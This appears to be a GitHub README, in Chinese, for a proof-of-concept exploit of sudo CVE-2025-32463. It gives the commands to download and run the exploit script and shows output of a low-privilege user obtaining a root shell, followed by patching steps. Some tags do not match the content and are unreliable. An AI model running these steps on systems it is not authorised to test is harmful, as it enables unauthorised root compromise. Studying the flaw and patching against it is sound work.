aexdyhaxor/CVE-2025-32463
GitHub: aexdyhaxor/CVE-2025-32463
针对 sudo 1.9.14-1.9.17 版本 chroot 功能的本地权限提升漏洞 PoC,可将低权限用户直接提升至 root。
Stars: 0 | Forks: 0
# CVE-2025-32463 – Sudo EoP 漏洞利用 (PoC) 及预编译库
本仓库包含 **CVE-2025-32463** 的概念验证 (PoC) 漏洞利用代码,这是由 Rich Mirch 发现的 `sudo` 本地权限提升漏洞。
## 致谢
https://github.com/aexdyhaxor/CVE-2025-32463/
## ⚠️ 免责声明
此 PoC 仅用于**教育和官方测试目的**。请勿在非您所有或未获得明确授权进行评估的系统上使用此代码。
## 🔧 系统要求
- 支持 chroot 功能 (-R) 的 sudo:版本 1.9.14 至 1.9.17
- 启用了 [nsswitch](https://en.wikipedia.org/wiki/Name_Service_Switch)
## 🚀 如何运行 POC
```
wget https://github.com/aexdyhaxor/CVE-2025-32463/raw/refs/heads/main/cve202532463.sh
```
检查当前用户是否具有低权限。
```
:~/CVE-2025-32463$ id
uid=1001(poc) gid=1001(poc) groups=1001(poc),100(users)
```
检查系统要求
```
:~/CVE-2025-32463$ sudo --version
Sudo version 1.9.15p5
...
:~/CVE-2025-32463$ ls -al /etc/nsswitch.conf
-rw-r--r-- 1 root root 526 Feb 16 20:57 /etc/nsswitch.conf
```
运行漏洞利用程序
```
:~/CVE-2025-32463$ bash cve202532463.sh
woot!
root@ubutes01:/# id
uid=0(root) gid=0(root) groups=0(root),100(users),1001(poc)
```
## 🚒 Ubuntu 24.04 LTS 修复方案
- 对于已联网的系统,只需运行
sudo apt update && sudo apt upgrade
- 对于物理隔离 (Air-gapped) 的系统:您可以从这里获取最新的 sudo 软件包:https://github.com/sudo-project/sudo/releases/download/v1.9.17p1/sudo_1.9.17-2_ubu2404_amd64.deb。将软件包传输到目标系统后,只需运行:
sudo dpkg -i sudo_1.9.17-2_ubu2404_amd64.deb
标签:0day, chroot, CSV导出, CVE-2025-32463, EoP, Exploit, LPE, nsswitch, PoC, Root, Sudo, SUID, Web报告查看器, 共享库劫持, 协议分析, 威胁模拟, 子域名枚举, 安全漏洞, 应用安全, 提权脚本, 暴力破解, 本地提权, 权限提升, 概念验证, 系统安全, 网络安全, 隐私保护, 预编译库